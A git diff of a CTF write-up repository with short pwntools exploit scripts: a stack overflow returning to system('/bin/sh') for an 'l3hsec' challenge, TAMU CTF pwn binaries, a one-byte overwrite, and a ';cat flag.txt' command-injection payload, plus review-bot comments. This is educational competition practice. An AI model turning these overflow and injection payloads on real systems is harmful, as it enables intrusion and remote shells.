-this license document, and changing it is allowed as long as the name is changed.
-
-DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
-
-TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
-
- 0. You just DO WHAT THE FUCK YOU WANT TO.
+DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
+
+Version 2, December 2004
+
+Copyright (C) 2004 Sam Hocevar
+
+Everyone is permitted to copy and distribute verbatim or modified copies of
+this license document, and changing it is allowed as long as the name is changed.
+
+DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE
+
+TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+ 0. You just DO WHAT THE FUCK YOU WANT TO.
diff --git a/README.md b/README.md
index f6bc931..11b4458 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,2 @@
-# ctf
-
+# ctf
+
diff --git a/l3hsec-writeup/README.md b/l3hsec-writeup/README.md
index 850d98a..557a2b0 100644
--- a/l3hsec-writeup/README.md
+++ b/l3hsec-writeup/README.md
@@ -1,13 +1,13 @@
-### stack
-
-用ida一看,找到字符串和ebp差`0x3a`,然后发现在`0x080491E2`有`system("/bin/sh")`。没了。
-
-```python
-from pwn import *
-pld = 'A' * (0x3a + 4) + p32(0x080491E2)
-p = remote("159.65.68.241", 10003)
-p.sendline(pld)
-p.interactive()
-```
-
-> `flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}`
+### stack
+
+用ida一看,找到字符串和ebp差`0x3a`,然后发现在`0x080491E2`有`system("/bin/sh")`。没了。
+
+```python
+from pwn import *
+pld = 'A' * (0x3a + 4) + p32(0x080491E2)
+p = remote("159.65.68.241", 10003)
+p.sendline(pld)
+p.interactive()
+```
+
+> `flag{e46f5601-086c-4f06-bcb2-a021e104c5e5}`
diff --git a/l3hsec-writeup/stack.py b/l3hsec-writeup/stack.py
index 48e7099..b15ff31 100644
--- a/l3hsec-writeup/stack.py
+++ b/l3hsec-writeup/stack.py
@@ -1,5 +1,5 @@
-from pwn import *
-pld = 'A' * (0x3a + 4) + p32(0x080491E2)
-p = remote("159.65.68.241", 10003)
-p.sendline(pld)
+from pwn import *
+pld = 'A' * (0x3a + 4) + p32(0x080491E2)
+p = remote("159.65.68.241", 10003)
+p.sendline(pld)
 p.interactive()
\ No newline at end of file
diff --git a/tamu-writeup/pwn1 b/tamu-writeup/pwn1 new file mode 100644 index 0000000000000000000000000000000000000000..2ba3d2b2d2b1644338bd9783f9f481d34612f589 GIT binary patch literal 7536 zcmeHMeQ;FO6~CJe5-~0dQlX0Vp-~axNiY@Ewq!%XM-3220y>DVo87nBh0VUW`xX)h zmAF-*ac45tah%cVXld)T(@x{ys8ekVE}t`WieD|Au`L~-U4(Y%fJ!T}{r&FUo4f=% z_3w@+bKbeXd(J)gymLSHzMDsyniu+fKB37k{DNr57$NE)i&K=QP8i}+F0oW;cs{_+wb>a17%Dpk-Svpb^=EZ;}YR` z+%Bvo%dLzXO{A=B#*PZRC*g{i(`~0jch=4D5s8P>LYjzJr;R$4ovbS?E7B9TVu@5Z znRw6^8Qa~^k&Q`*FpIz}9qHx~5t+UHXmAzTY^rD7%W6qKa`RDhPD=@=Y%h}^AuW`;t z(u73fa%Smalv$U#Hi4}9#g;M-N_~ZR8kod&Sq1q@S)Ro}5my>Y9tFMxT@@*@XiieX z;1neW>kjE?9 zw;s!#oV22JFt;nXzc7$@Zxp8s`B$M8#UJ3&_tqM;Z}&R5dEeG!tvk`nbSrULOy$epY%ZRhS${Nwpj2|kKnMTCB1X_+K@hMw^ymo3^elWzQ7<`k4%4OVjDi z51lS${{WM9?s z7TKICy=;4Z6E64`>J+S4+pd@d-yE@dpIC_ z7#z~c5Fb#m@1axsf-n9lJGS_BdLi`SW*ynXiGHEZ+XbDqf_8yIL`y{ff1 z7NPeQUb|A}us>NdJ-@vYQ=(Y-v{cIH1d2EB*?GR=v5(ywYD;QfBZ2KDw`Qi~r{ADW zZm$nh?T+)=Be`AGYwow!7V;ag4$Aw_HpJ3bXk{PVaQM6K!~VN6(HVD5V|grQ^g3Ci z(=kO_#FF7o)9rC#)9O0i(~Q+|$Jpp(lTjm*b}|{mjoU^;IuY%(4JT$a+F>_tbY(NH z5l&?`+G(T9rb)&&9?04mH{qn%ByHO>4g8+S)(-S(Ba?{Q27F~~+Z3zgVb?TGBavY! 
zX(JWxvgeD|MA~Q$ry_RJaoO1d)S`&(RxB~1PU!fDu@W`we3>Wojjz@ZFg zzG!pU-+CFwVkg;aEJ}wHNpqanzN;5Dk+kj3XP&P1-!%`C=dI+wOC_%CsTi6b$OO{* zB;+y3LCE_s2a1qyLe^o+pM)~W_uxw5+f?Pdy1KG*3+fHjac2&~AKQsQ)xtpaH^*P* zR`!VbSKT#ZPR(^eRM&%_hYial1I+&4NB^53MJQ19SVhC-V;Xb*3U_w_?&Ud{vCTqE z>(G~ItoDgT!7&wC(Kz0p?YSiAugGrlxBGUYK2!+pUcgpDa8G6|NleGJkji%`Q2m5I z6bL?E8466wjae2j5`mgfV0vRW;LY&G zJ>m=cA_M=A890Sa;RP_48Mzw#9_Bxef1(X%L!1%h`SfZ?t}%Xt@SMuEPyEsOlJiqE z#IaJG#6sa7a{!q8+YvCo8Mv0d1SWCc9>lqlYpMmz{e|BelfmDHLze3x`Mp9tzjLd= z=u%2-8xGu8VS94Uz!`owh{Y+$gTUBo9LDu|iQl`LuEa~+2)-S>5WET;18)F74t@sw zBk;wj7w2hBl?J{!7c98bnBLxzO}SZPu6dg|d)Az}SqW<&uAOJjuDe-P>qes_zx7G# z_5df=A*^;I?!ijWj0(XqAo=B}s4-Aj1w6bBp8`_;3NmhcIW0x=Wz+%Nc=qIiV!x z%usWZ(l2L-nv)8vUo1VY{_@P@oKt$7AV`LMqCICGCX^us@Dx=jKmAw%<mHm5B?WIat)DuSOHy-T!$pu_d@cUkmSSrJ*$fH z$^J*j^J8c}C=Y{AuAJcpw0{jy_s12r4_N2Nhy1(^tox(>C@}AG6ipDHprG^T6IY7M z5kL#Zi&JVM;=RTb5J%@$4>o}BCdT`53QepCh@Hd+7-S&-9mHi~`|v272G-*fg#Bb- zJ%1)*{`8Kr&jbIfoKN<*&7;2#{(ntufI;-f{Yn%2|GCNu9MDK;cSnHI9=UI+qI+S+&S}V zFK)z(qJ$Mrr^CILopRH?B9_L1+KOhox_Z&XgDhCOBTStQcG}vQPPn$UA)H2VmbGwY zXlawxw5-v>EzrmoQDHUSyDYSH$%2s@c?E?k+$vg4i_0DsH?9=cqUPldp=N9O!iB9( zZB|>Tp}C1(<;7Jbla;ZT@3ZRb_4U>Nx~S@zce{y;FsnOax$$gjz1h*DF3?7}u%lr& zJalO`LSK55*+yOp zUT}psvf)sgIBx2u&}&e>81z=j3&!D!T7AtpT!naJ-Bx^K`Lc0@!s^Im$}cJJ6T8!i zlxy+R5ig0`LOm;Zjd=09K{M0a<%TjN)+fqlm9?X*n?ezZ{43ssMw--^13T?+T5V=MhL2A23lt0E7*Th2gnAPKOYd%jwg~;U>=cZ$Fmgq2+EphOS&J-Gb!zO#v(I5-7o9O>%lz3 zvdps=xgKS2zkuRFFt&2phUa23&&Apw-+|}j9GG?uV4l^;+Kwk4ZO3nY#>#%UXOpi- zSrhF@Pk^dyWK(w2oit@?6G&9GV>R@*e4!Qns k0n<0C<6+G-&Q%p8PSF=_*MR(*0I{LqmF1_Mq05T!?eij?|1LsT!#-&O!PZ;8S(IhSx)5UqH zqD-TK2E-uhhyh?Hc#TuQ6DdQrM37O~aG?-HbSXr=lJ5%%vF{3n9Ti*bmvTSIFyzCK z6HkLDQm%bSqK(E@)DyL=;{z+6J0I^@!EZxG)biDkgFOdmAKi;JkbC`GhQ5ew4Usc85?BOS&e8|HaC}YZqw`*1GCUImC_ZZ`SqcE4RG7DBb zl`-u?A})FoRzY-UbBT;7SousW*DrE5s_=*u^9PvjFlse+Zr zcdl5R&Snyw(XMm?)_QugnTj=2seY~^-j*}Kk6&Q46qG#cefX)h%XvnaluBL1=-h)c z>k2bcnDGJeK!vZDa=#b?PvCk(IK}=7J&ge)A2bwoz@LY%j*->~ah!C55GP5|(-~5% 
z%Y&d3FiBq~#e_agiV1#%6pQF}QW$=d6dt`zdVvt{l44MglGX{aws@@8xe$hSl&4G+ zVz9UX&g>kvYMkGoP&`o5&AIzL9)0`THbKQIejG5d&u2GmF}UI ze{33fuXyx$N9P)cYidV%0hVE@SUcjn9i`$g9gx-Q-MtGTbFwgSa&UTMxqC?e#&g|6 z&QTiq!wGEDrH4CEF5S=PO)p!Q58h8N5w9uh20kbrYgp|bDITnUr94!!t`;ZCCAoZ^ zCuIA*Xur;D;M$i5K3IF;w11#nJQh6g(G1_4e>!b73_jXQldoA9U}!p4yRX6E;Knnr zlm||g_Fn^$Kv!#>JK*<@vI(1LeBX0)NZ8j578wfoGpTs2&fVJ%#`)V>*M$w|8))%j zk&3=^>}?#Oy}^dYGL6Hc^BCqtjf*jZq0&$jLbqn1?6fFbL(+g!ZEy~wa!2{~if(Zs z!|Y5@ns|p&af=FkS_-aEf`PV^AJtEMq3s0hcQ}`7?K;;!={)zD^!TB+6Zd`hgloSA zl`R)IpQ>7K-$CbNyiUyq?WSFE^Wk$<=Q&qNH|IdNRQ&Wq*M$do(JeDvySCK!Mu+pH zY9u`#lpeEoqN?3FY@c5$?)tlIHrRI3J)-<5wKoPa)!gr#VKi13j~UMMXtASw=n}4` zTjAcI*utN`!~$4-g|WeOV^e8w5Y3%wFj*=J6t8{pz*+y!Q`S{2u9}y4`*p6> zI9uWmpQBFkB_BGx>8$;J@nGFuo6L>n(pJpl%0BTvZ0#t2ba7>4;CIxAy|FWyDj4|d zwlgs+mCYE|w(LyEWc_F*6be=5qW7x!J z3Ot0kBbkaN$9mb8wbOB$nGRD^1mgz9dec%c>S6SrM<%XM=bXVs&6A&@??OfZ0*zyXBz>!2bM zs@>^dbWu%fF%UachIOUW2hk98wpZ!+Ev00jeizXB0z1Rd`4~DILA`zX*C{*AsOEOp zgt!!_(^}^fOY3X=wrHIgu=~!d5BTlv{!Ir^9Vtf+Ery4D7sjp!ZQ!niWq8g;T^w~| zeMLfb4+bKk`tJuLp@w43%8-!?HAX^Bt)bbiq2?7KV`-=%QV!KeUJTVmUJBJl4uxQl z_WNL~54QLf{tCW|z*iCY|3_dq^2iP#mY&2q&|O%MNJGUzWP3ceGM`1>D9=_%vSeP% zeUSUWr)S;lQ)rAdRvgB{<=O5qc<#&Z0C~3H+Ws1l!0*XE@Z7864K(}^cnZk8 z{9@qMz#D-}fa`(P@HX;x4M78E&c%ywHk#IT*%`|==7(=lm#1%P8h2*?ptb3^eQS=<|p$~kj{*j$NGK+Yg_|H1lzz<~z9IYkJ_(>Bg7qdaGc zx=SDp$eDomQEq_ej8JotG$3b&nv058Uu`{}fy#{ITvKvnGz3FF(VjC76UmSS{8Uw_ zJOh~dmC(wXp!me)8xB|A&yV+!Z=}MC`5Y26A?I2mke?4q`?TYO{UxA06B2xw`MscA ze+26HgL17Ae0V?RG8))_wLecl*r|pA`YJwN{b#}G{*i60xY|q?Gk54`1lfmoxGa2(|Tb2GG_+M4xN&Am`y0zSwBV3Pk5aSFWmo}{L-wkT)&S>QJ#KFoy}kGWOywkm#o75@U-)fspI>M>tZ zRq`_W=Y1l9_P0aM^}~4b-lpi$=RW!)@SRxZdVGEgek`6-#gpKgDwp7Hn#cnt;$v%&M*L70r4{}b@{!oH4&h~=$VnQ%2pGXNaK~`!fd^BWn{(j z#p5ON1`AcVa5USNRV*xPT_en;?W-0=+Rar`U+S_PV-h0Igwsc$IC{?)< zTewi)fPK+jSKopg!?;T`b1~CO+L^nOblPE?%vFJA!{b1nKm$pP$1~-gixF-wNO5ji) z<`RNVR!*95B3W59$v8}CPBm4lN43ypbP(-L#o!U=To?frVXR!9{nd`}<(|wlxeaq` z@&4aKx2BA6C6E~m^_U|O4U{!hwjt4i3a!W7iP)%>K($^g%BPS!(jIdvqJeT{yOny> 
zT?ynTmwL=|iFBBs9Tus>OlCchsg=~jgLxRguNtUJ*aTz_OFiahL<42rFYAeS1DW%( z%$$w55M^(_VC5Y(KjGA49!*?^vbIP6xWyNN)LR5(jz`pb%#^g=BPi2X_QSoMcqPgj zs7H7ZsP%?XN!(3A1sD_RJ_^)&o8c5uWqwMLz7c=!(c?FdxCZa6LAQC_qsQEUs4_vN zsr~y!MUQdeHkmPdd%7O{|`ORA&v$0n9B`A?{uXOMB2iuiN}C+NA`;xcpr=}1Fu2%>!3pG z2?GoQ%k~uImn076g8P$g}Uo~V?Y$pEN#ohr&F`_jm<&@c~r$6=7`pZN-H hqe{+E_Nk!}2g%Po4QY$Oe8;Od6Y2aJDNzrt_g~LseZ&9& literal 0 HcmV?d00001 diff --git a/tamu-writeup/pwn2wp.py b/tamu-writeup/pwn2wp.py new file mode 100644 index 0000000..378b545 --- /dev/null +++ b/tamu-writeup/pwn2wp.py @@ -0,0 +1,5 @@ +from pwn import * +sh = remote("pwn.tamuctf.com", 4322) +pld = 'a' * +30 + p8(0xd8) +sh.sendline(pld) +sh.interactive() \ No newline at end of file 
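Review bot: `pld = 'a' * +30 + p8(0xd8)` in pwn2wp.py joins a text string to the result of `p8()`, which is `bytes` under Python 3 pwntools, so the concatenation raises `TypeError` there; the unary `+` before `30` also reads like a typo. `pld = b'a' * 30 + p8(0xd8)` behaves the same on Python 2 and works on Python 3. The constants 30 and 0xd8 carry no explanation, and a one-line comment saying where each was read from in the `pwn2` binary would let a reader check them. `sh.sendline(";cat flag.txt")` in pwn4wp.py passes text to `sendline` in the same way and would be better as a bytes literal.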
diff --git a/tamu-writeup/pwn4 b/tamu-writeup/pwn4 new file mode 100644 index 0000000000000000000000000000000000000000..311e8a2ee75f74257c377278a33da52d933b808e GIT binary patch literal 7504 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 E-_3!+*Z=?k literal 0 HcmV?d00001 diff --git a/tamu-writeup/pwn4wp.py b/tamu-writeup/pwn4wp.py new file mode 100644 index 0000000..da0a088 --- /dev/null +++ b/tamu-writeup/pwn4wp.py @@ -0,0 +1,4 @@ +from pwn import * +sh = remote("pwn.tamuctf.com", 4324) +sh.sendline(";cat flag.txt") +sh.interactive() \ No newline at end of file
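Review bot: pwn4wp.py has no comment describing the weakness it exercises, so `sh.sendline(";cat flag.txt")` is the only record of the finding. The leading `;` suggests the service places its input into a shell command line, though the `pwn4` source is not part of this commit; a header comment such as `# pwn4: input appears to reach a shell command unescaped; the fix is to pass it as a single argv element or validate it` would record both the cause and the remediation. `from pwn import *` could also be narrowed to `from pwn import remote`, the only name the script uses.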